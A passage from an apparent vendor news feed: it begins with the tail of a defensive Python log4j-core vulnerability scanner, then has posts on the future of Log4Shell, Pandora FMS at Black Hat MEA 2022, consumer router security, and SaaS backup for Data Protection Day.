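    new = make_jar({POM_PROPS: b"version=2.16.0\n", JNDI_CLASS: b"\xca\xfe"})
    app = make_jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": old,
                    "BOOT-INF/lib/log4j-core-stripped.jar": stripped,
                    "BOOT-INF/lib/log4j-core-2.16.0.jar": new})
    return scan_archive(app, "app.jar")

if __name__ == "__main__":
    results = demo()
    for f in results:
        print(f["status"], f["path"])
    print("not in ledger:", unrecorded_fixes(
        results, {"app.jar!/BOOT-INF/lib/log4j-core-2.16.0.jar"}))
```

For a real host, call `scan_tree()` on the application directories and keep the output with the asset list; a `review` status means a copy of the class was found without Maven metadata, which is typical of shaded or repackaged JARs.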

What is the Future for Log4Shell & Cybersecurity

Recognizing the problem is the first step in solving a complicated issue like cybersecurity vulnerabilities. Just a few years ago, security breaches were a taboo subject that was rarely addressed outside of the computer sector, and firms that had experienced them were unwilling to reveal and provide specifics. The latest round of public hacks has elevated cybersecurity to the level of board discussion for many businesses. Additionally, customers can now evaluate businesses based on how they choose to handle these incursions.

Another hopeful aspect is the fact that cybersecurity education is becoming more mainstream. Degree programs in cybersecurity are currently available from many prestigious colleges, including Stanford, MIT, and University of California, Berkeley. Similar initiatives are being made in the tech and cybersecurity sectors. There will be a record number of highly skilled professionals in the security sector. They also gain knowledge from the intrusions and weaknesses. News stories from today become case studies and precedents in the law of tomorrow.

It is also encouraging to see that vendors are building new technology with security in mind. While not all technologies will benefit from this, and the environments won’t be future-proofed, it represents a significant shift from decades of development practices. Although it will take time for these modifications to take effect, keep in mind that the choices that led to the creation of Log4Shell were made years ago.

Seeing more public-private partnerships being formed is a step in the right direction. Companies and governmental organizations are working together to exchange knowledge about vulnerabilities and incursions. Organizations are sharing technical information and more comprehensive strategic lessons learned for the good of everybody. In order to respond and address these problems more quickly and effectively, this happens at numerous levels and across a variety of teams.

These are positive moves the security sector sorely needs to take. It raises the possibility that the world will have considerably more robust and resilient cyber defenses in future.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Pandora FMS Journey to the Middle East, Black Hat MEA 2022

At Pandora FMS we like to travel! Traveling, meeting people, bonding… And barbecues or country getaways are great, but there’s nothing we like more here than an event focused on technology! That’s why we accepted the exceptional invitation to the latest Black Hat MEA edition held at Riyadh, Saudi Arabia last November. There we went, to the Middle East no less, with our stand and our roll up, to present our respects, and services, to the most cutting-edge community that exists out there.

Pandora FMS visits Black Hat MEA 2022, the event of the year

For those who are not aware of all this stuff: Black Hat MEA is a fairly iconic cybersecurity event, with year-round ethical hacking courses and offensive security classes that everyone wants to attend. A global event that pushes the secrets of data security to the limit. The largest information security trade show held anywhere in the world in 2022, bringing frontline and technology-loving companies together annually in a professional and festive atmosphere. But I will explain. We better talk to our lucky Pandora FMS colleagues who were able to attend this latest edition on behalf of our community. Alberto Sánchez, Systems Technician and Alexander Rodríguez, Salesperson.

Alexander, what would you say Black Hat MEA was like for Pandora FMS?

I think the event was a great chance! Having a space within the booth provided by our exclusive partner in Saudi Arabia, LoopTech, was wonderful.
It allowed us several positive meetings with clients. In addition, we had the honor to receive the visit of his Excellence Advisory Mr. Turki Alshikh. We were able to present him not only Pandora FMS, but the rest of the solutions in the field of Cybersecurity that our partner Looptech has. We were very happy to receive a lot of positive feedback from the product. Without a doubt, having participated in this event will help us achieve a better position in the Middle East market.

What did you learn from a place like Saudi Arabia and its people?

Saudi Arabia surprised me a lot. It is a country that is growing very fast. Although it still retains authenticity in the mud buildings in the middle of the desert and the spectacular sunsets on the dunes. Its people are super friendly and are willing to help you in everything necessary to make your stay as pleasant as possible. Most people speak English so it was very easy to communicate. And I was hugely impressed that everything there is “go big or go home”: great plates of food, huge malls… I would go visit the country again, without a doubt, to continue finding out more about its culture.

And you, Alberto? What do you think Pandora FMS contributed to Black Hat MEA?

I believe at least that Pandora FMS contributed to difference and originality, compared to the rest of solutions that showed up to the event. As you already know, Black Hat MEA was focused in cybersecurity, meaning there were thousands aimed at email or mobile security, others focused in failure detection and there were those that avoid intruder access to devices. Well Pandora FMS, among all of them, proved to be the tool that better looked after device health.  That its essential security feature is simply to prevent device malfunction thanks to monitoring, was something that stood out above the rest.

Any special memories of such an incredible journey?

It’s a tough question, because the whole trip was incredible. The kindness and “brotherhood” of the people was shocking. It was surprising the diversification of cultures that we experienced with people from all over the world, and the number of students who visited us asking really difficult questions to answer… But, if you insist, I’ll tell you a very funny moment that stuck with me. During a demo we could see that a group of students from the women’s university in Riyadh stared at us and laughed. When we finished the demo, we invited them to ask things about Pandora FMS and we took the opportunity to ask them why they were laughing during my demo, you know, in case we had failed at something… Their answer, while laughing, was that the word “Pandora” in Arabic is “Tomato”.  For the rest of the event we struggled, at the booth, to say Pandora FMS without a smile on our faces.

About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

What happens when your router is hacked?

Most people understand that routers can be hacked, but not everybody realizes just how damaging this kind of cyberattack can be. In this article, I will explain exactly how a hacker can target your router, what the consequences could be, and what you can do to protect yourself.

Most users underestimate the risk

No one wants to be hacked, but it’s easy to come up with excuses for not addressing router security issues — excuses like:

  • Hackers don’t want to hack me (aka: “I have nothing to hide” or “My data isn’t valuable to anyone”).

  • It’s too complicated to secure my router and configure it properly.

  • I assume that it’s secure by design (aka: “I trust my ISP to secure it”).

Do these excuses look reasonable to you? Maybe, but the truth is that most hackers would be happy to attack your router if it’s not properly protected, especially if they can do so quickly.

Securing your router is not technically complicated – you don’t need an IT specialist to keep your router safe any more than you need an automobile engineer to drive your car. Making sure your router is protected should be a standard part of internet use.

Finally, you should not trust your internet service provider (ISP) to keep you safe. More often than not, its security measures are inadequate.

Types of vulnerabilities

Routers are commonly attacked using five main methods. In all the cases, an attacker gets root access (also known as administrative access) and gains full control of the device. The following list begins with the most unlikely and challenging hacks and ends with most common methods, which are also the easiest for the hacker. Each method also comes with an example of the tools and exploits a hacker could use to carry them out.

Physical (Hacking level: extremely difficult)

A physical attack requires the hacker to get physical access to your router. If they manage this, they can bypass security measures and get full administrator access. This process usually involves connecting the router to special hardware (in most cases, a serial console or JTAG).

While it may be a challenge for them to get close to your home router, hackers can use other ways to gain physical access to these devices. For example, they could target an outdoor wireless extender placed in the yard or a wireless router in a hotel that is used by guests.

  • Example: Almost any device with easy access to TTL or JTAG (for example, D-Link DIR-825AC) could be used to launch this hack. JTAG can also be used legitimately to unlock and customize a router.

Local authenticated (Hacking level: moderately difficult)

To perform a local authenticated attack, a hacker must connect to your LAN (local area network) or Wi-Fi. Usually this involves connecting a tiny device to a free network socket or cracking a weak wireless password.

The hacker must also know the default administrator’s password (or be able to brute force it). Collections of default router passwords are available to hackers online as well as tools that allow them to brute force weak passwords. Infecting a local connected device, like a laptop or smartphone, could give the hacker the same level of access to your local network.

Local unauthenticated (Hacking level: challenging)

Like the local authenticated method, a local unauthenticated attack requires the hacker to connect to the LAN or Wi-Fi or to infect a local device. This time, however, the hacker does not need to know the administrator’s password.

Usually, local unauthenticated attacks involve exploiting some software vulnerability in your router’s firmware (for example, the buffer overflow in its web management function) or accessing misconfigured components (like a default telnet left without password protection).

Remote authenticated (Hacking level: relatively easy)

Remote authenticated attacks are possible against certain routers via the internet, so the hacker doesn’t need to be close to you or join your LAN. They still need to know some default credentials to bypass the service password, but they can also brute force it if necessary.

  • Example: The Huawei LANSwitch model with a default Web UI open to the internet. This exploit was resolved in January 2023 but still acts as a good example of a remote authenticated threat — albeit one that is no longer active.

Remote unauthenticated (Hacking level: very easy)

Remote unauthenticated attacks are the worst-case scenario. Remote unauthenticated attacks can occur if anyone can access the router from the internet, without needing an administrator’s credentials.

Usually, if a router can be accessed in this way, it is the result of the device coming with bad default configuration, a hidden backdoor, or a vulnerability in the software. In some nightmare scenarios, a router may end up with all three of these issues.

A router with these problems can be quickly scanned and exploited by thousands of automated bots or commercial providers (Shodan, for example). It takes between a few minutes and a few hours for the first bot to reach the device once it’s been connected to the internet. After scanning the router, a bot will be able to identify the model and use the appropriate script to gain access.

What happens once you’ve been hacked?

Your router has been hacked. What happens now? After gaining root access, the attacker’s power over the device is unlimited. Here are some of the steps a hacker might take next:

  • Add a persistent backdoor to allow for remote device use or botnet inclusion.

  • View your unencrypted traffic in plain text (using tcpdump, for example).

  • Carry out deep packet inspection (DPI) on any encrypted traffic.

  • Redirect your traffic (for example, through DNS spoofing or by using iptables).

  • Launch social engineering attacks against you (for example, a hacker could redirect you to a fake website, pretending to be your online banking platform, where you might expose sensitive information).

  • Disconnect you from the internet and demand a ransom to restore access.

  • Make your router a proxy for other criminals to perform criminal activities from your IP address (potentially leaving you to convince the police that you weren’t the source of the criminal activity).

  • Hack your other devices (moving laterally) which were not accessible from the internet. If successful, this could allow the hacker to install ransomware or cryptominer malware on your other computers at home.

Still think it’s not worth your time to secure your router?

How to protect your router

If you think it’s time to start protecting your router and the devices connected to it, take the following steps.

  • Understand that your data is valuable. Even if you are not a celebrity or a high-profile politician, it’s still worth a hacker’s time to attack your router. Always see yourself as a potential target. You don’t have to be paranoid, but don’t ignore the risks.

  • Buy a user-friendly router that has good documentation and a clear user interface and that provides technical support and firmware updates. These routers may cost more, but security is a worthwhile investment.

  • Do not trust your ISP. ISPs tend to lower maintenance costs by saving on security. If possible, avoid using the router provided by your ISP, or at least unlock and take full control of it (change the default password, disable remote management, remove backdoors, and enable a firewall).

  • If possible, use WPA3, and protect yourself with a non-dictionary-based password containing at least ten characters. Never use WEP or unencrypted Wi-Fi.

  • Use a VPN on your local devices (laptops, phones, TVs) to encrypt traffic.

You should now understand both the risks of an unsecured router and the actions you can take today to protect it. Stay safe!

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Data Protection Day Is Here!

Data Protection Day – also known as Data Privacy Day – is an annual event observed on January 28 to raise awareness about the importance of protecting data and data privacy (think NIS Directive, NIS2 Directive, and GDPR).

It’s here to make data protection, such as SaaS data backup and recovery, top of mind—and for good reason.

Businesses must take the necessary measures to not only ensure the continuity of their operations and to protect themselves from the potentially catastrophic outcomes of a data loss event like ransomware, but to also comply with the increasingly strict demands from legislation such as the NIS2 Directive and the GDPR.

 

Why Is Data Protection Relevant?

As businesses increasingly move operations to software-as-a-service (SaaS) applications to streamline their operations, add flexibility (such as enabling remote work), and reduce operational costs, huge amounts of business-critical cloud data are produced every day, and it becomes ever more important to assess and ensure a robust backup and recovery plan is in place.

There is a widely shared assumption that data stored in a SaaS cloud is automatically backed up and secure since it’s in the cloud. However, that is not always the case as what is offered may not provide the protection necessary for business continuity, data restoration, or compliance: Read more about the M365 shared responsibility model.

Cloud Data Concerns

It should come as no surprise that working with cloud services can come with risks. Ransomware and disaster recovery are more and more frequently in the headlines and serve as cautionary tales. (Read our post about the disruptive power of ransomware attacks here.)

The rapid adoption of SaaS applications has also come with new and increased instances of data loss and breaches—especially in cases where there is a lag between adoption of SaaS apps and adoption of the necessary data protection. Companies may be left vulnerable to costly disruptions, downtime, and devastating fines without an adequate data security plan in place to safeguard mission-critical cloud data.

What Needs to Be Backed Up?

Data protection not only involves “just” backing up cloud SaaS data, but it should also focus on ensuring control of and continuous access to it (and the right access for the correct users at that). As with Microsoft 365 and Azure AD (Active Directory), there is a data plane and a control plane – and both need to be protected.

One way to achieve this is to adopt a solution that can not only protect the data plane but can also preserve and protect the control plane, e.g., the admin center. Coverage of identity and application objects businesses rely on to remain operational is vital. For those using Microsoft 365, it’s important to learn about why you also need Azure AD data protection: Find out why in our AAD blog here.

 

How Do Businesses Protect Their Data?

The best way to mitigate the risks of SaaS is to implement a data protection and management plan. This can involve using cloud-based data backup and recovery solutions which allow businesses to store their data in an independent cloud and access it from anywhere, at any time.

Data protection is especially important for businesses that rely on SaaS data for their operations, which is many, many businesses (Microsoft 365 alone has over 345 million users), as it can help ensure that data is always available, even if there is a disruption with the SaaS provider.

While cloud services can (and do) provide many benefits for businesses, they also present their own set of risks. For example, there is a very real risk that data stored in the cloud could be accessed by unauthorized parties (read our blog about the Zero Trust Principle here), or that data could be lost due to any number of issues, from technical glitches and issues to human error. Therefore, it’s important for companies to follow cloud data protection best practices. Read about backup strategy here.

 

Data Risks and Responsibility

But why is backing up SaaS data so important? Because it allows companies to mitigate the effects of ransomware and other data loss events. Many SaaS providers (e.g., Google, Microsoft, Salesforce) have shared responsibility models that state you, the customer, are responsible for the data created and processed.

Here are a few reasons why backup is vital:

  1. Data breaches can happen to anyone.

    While no company is immune to data breaches, having a backup solution in place can help minimize (or even nullify) the impact of a breach, helping businesses get up and running again quickly.
  2. Data loss can be costly.

    Losing data can lead to lost productivity and lost revenue within the company, and it can even result in substantial legal penalties. (Read our NIS2 post here.) According to the World Economic Forum, “historically severe fines for data loss are also helping change the cost-benefit assessment around investment in cybersecurity measures.” By implementing a backup solution, businesses can minimize the impact of data loss, avoid fines, and get back to business as usual faster, and more comprehensively, than without.
  3. The future is uncertain.

    A bit cliché, but it’s impossible to predict the future and that includes the risks to your data. According to the ESG (Enterprise Strategy Group) ransomware e-Book, “79% of respondent organizations report having experienced a ransomware attack within the last year.” By implementing a backup solution now, businesses can protect themselves against potential risks down the road – which stand to only increase.

 

Where to Go from Here?

Data Protection Day reminds us that SaaS data (and the protection of it) is essential to many daily operations. Not only that, with the scope and penalties of NIS2 and GDPR, enterprises are obligated to ensure a dedicated data protection solution is in place.

Researching a third-party backup solution like Keepit can simplify the complexity of the current SaaS data protection environment. Businesses can maintain control of their data always and protect themselves against data loss events and mitigate the impacts of breaches and ransomware – all while remaining compliant.

Don’t wait until it’s too late — what better way to celebrate Data Protection Day than to start backing up your SaaS data. Continue your journey by exploring our free e-guide “Leading SaaS Data Security: Raising the Bar for Data Protection in the Cloud Era.”

About Keepit
At Keepit, we believe in a digital future where all software is delivered as a service. Keepit’s mission is to protect data in the cloud. Keepit is a software company specializing in Cloud-to-Cloud data backup and recovery. Deriving from +20 year experience in building best-in-class data protection and hosting services, Keepit is pioneering the way to secure and protect cloud data at scale.